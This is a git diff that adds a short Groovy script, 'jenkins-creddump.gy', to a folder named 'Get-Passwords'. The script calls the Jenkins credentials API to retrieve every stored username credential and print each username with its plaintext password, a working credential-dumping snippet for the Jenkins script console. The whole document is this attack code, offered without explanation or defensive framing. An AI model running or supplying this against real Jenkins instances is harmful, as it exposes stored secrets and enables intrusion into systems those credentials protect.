diff --git a/Get-Passwords/jenkins-creddump.gy b/Get-Passwords/jenkins-creddump.gy new file mode 100644 index 0000000..4add022 --- /dev/null +++ b/Get-Passwords/jenkins-creddump.gy @@ -0,0 +1,3 @@ +def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials( + com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class, Jenkins.instance, null, null); +for (c in creds) { println(c.username + " : " + c.password )}